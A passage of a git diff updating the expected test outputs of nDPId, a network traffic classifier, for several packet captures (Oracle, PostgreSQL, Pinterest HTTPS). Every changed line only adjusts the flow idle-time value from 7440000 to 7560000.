@@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"oracle12.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1481291750025} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1481291750025,"flow_last_seen":1481291750025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1481291750025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1481291750025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1481291750025,"pkt":"UlQAEjUCCAAn5\/q0CABFAAA8b5VAAEAGbI0KAAIPCgBIi50iBfF8VCT6AAAAAKACchBeyAAAAgQFtAQCCAoFQUtvAAAAAAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1481291750026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1481291750026,"pkt":"CAAn5\/q0UlQAEjUCCABFAAAsAf4AAEAGGjUKAEiLCgACDwXxnSIAeB4BfFQk+2AS\/\/\/WoAAAAgQFtAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1481291750027,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1481291750027,"pkt":"UlQAEjUCCAAn5\/q0CABFAAAob5ZAAEAGbKAKAAIPCgBIi50iBfF8VCT7AHgeAlAQchBetAAA"} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match 
by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1481291750025,"flow_last_seen":1481291750025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1481291750025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1481291750025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1481291750025,"pkt":"UlQAEjUCCAAn5\/q0CABFAAA8b5VAAEAGbI0KAAIPCgBIi50iBfF8VCT6AAAAAKACchBeyAAAAgQFtAQCCAoFQUtvAAAAAAEDAwc="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1481291750026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1481291750026,"pkt":"CAAn5\/q0UlQAEjUCCABFAAAsAf4AAEAGGjUKAEiLCgACDwXxnSIAeB4BfFQk+2AS\/\/\/WoAAAAgQFtAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1481291750027,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1481291750027,"pkt":"UlQAEjUCCAAn5\/q0CABFAAAob5ZAAEAGbKAKAAIPCgBIi50iBfF8VCT7AHgeAlAQchBetAAA"} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} 
+00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":1382,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1481291750055} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/pgsql.pcap.out b/test/results/pgsql.pcap.out index 34ba20f94..b8b81599a 100644 --- a/test/results/pgsql.pcap.out +++ b/test/results/pgsql.pcap.out 
@@ -1,17 +1,17 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pgsql.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1103453983214} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983214,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983214,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8\/wlAAEAGPbB\/AAABfwAAAbNqFTjJW\/IgAAAAAKACf\/\/rIgAAAgRADAQCCAoTQg0pAAAAAAEDAwA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2rJRrU9yVvyIaASf\/9MIgAAAgRADAQCCAoTQg0pE0INKQEDAwA="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA0\/wpAAEAGPbd\/AAABfwAAAbNqFTjJW\/IhyUa1PoAQf\/+1PwAAAQEIChNCDSkTQg0p"} 
-00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983215,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983214,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983214,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8\/wlAAEAGPbB\/AAABfwAAAbNqFTjJW\/IgAAAAAKACf\/\/rIgAAAgRADAQCCAoTQg0pAAAAAAEDAwA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2rJRrU9yVvyIaASf\/9MIgAAAgRADAQCCAoTQg0pE0INKQEDAwA="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA0\/wpAAEAGPbd\/AAABfwAAAbNqFTjJW\/IhyUa1PoAQf\/+1PwAAAQEIChNCDSkTQg0p"} 
+00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983215,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":2103,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1103453998615} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 39/39 diff --git a/test/results/pinterest.pcap.out b/test/results/pinterest.pcap.out index c7daf832e..9a31307b2 100644 --- a/test/results/pinterest.pcap.out +++ b/test/results/pinterest.pcap.out 
@@ -1,243 +1,243 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pinterest.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605289710318} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289710318,"flow_last_seen":1605289710318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289710318,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605289710318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710318,"pkt":"qtsDr8lk5EKm5WPyht1gCMmjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYwBu9VDYL21LWgegBAB9TESAAABAQgKz6ojDMK4Yvg="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710576,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBjLUtaB7VQ2C+gBALgY8wAAABAQgKwrkTpM+oCrY="} 